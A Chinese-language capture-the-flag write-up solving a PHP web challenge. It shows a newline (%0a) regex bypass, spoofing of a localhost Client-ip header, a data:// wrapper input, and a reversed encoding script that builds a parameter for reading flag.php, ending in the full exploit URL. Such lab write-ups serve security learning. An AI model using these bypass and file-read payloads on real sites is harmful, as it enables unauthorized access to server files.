查看源码发现

PHP非法参数名传参问题，详细请参考我的这篇文章：谈一谈PHP中关于非法参数名传参问题

正则这里绕过使用%0a换行符绕过，payload: /?b.u.p.t=23333%0a

得到下一步信息：secrettw.php

注释中的是JsFuck，用这个网站去运行即可得到信息：https://jsfuck.com

POST传个Merak=mochu7即可查看源码

<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';if(isset($_POST['Merak'])){ highlight_file(__FILE__); die(); 
} function change($v){ $v = base64_decode($v); $re = ''; for($i=0;$i<strlen($v);$i++){ $re .= chr ( ord ($v[$i]) + $i*2 ); } return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

这里这个getIp()尝试过常见的XFF绕过方法无效，这里也不知道takeip.php，也是看别人的Writeup才知道要添加一个Client-ip请求字段，至于file_get_contents($_GET['2333']) === 'todat is a happy day' 都是老生常谈的考点了，伪协议php://或者data://传入即可。

至于change($_GET['file'])，逆一下change()方法，即可控制file_get_contents()读取文件

<?php 
function change($v) {$v = base64_decode($v);$re = '';for ($i=0; $i < strlen($v); $i++) { $re .= chr(ord($v[$i]) + $i * 2);}return $re;
}function unChange($v){$re = '';for ($i=0; $i < strlen($v); $i++) { $re .= chr(ord($v[$i]) - $i * 2);}$re = base64_encode($re);return $re;
}$data = "flag.php";
var_dump(Unchange($data));?>

PS C:\Users\Administrator\Downloads> php .\code.php
C:\Users\Administrator\Downloads\code.php:22:
string(12) "ZmpdYSZmXGI="

注意需要添加个请求字段：Client-ip: 127.0.0.1

/secrettw.php?2333=data:text/plain,todat is a happy day&file=ZmpdYSZmXGI=

查看源码即可获得flag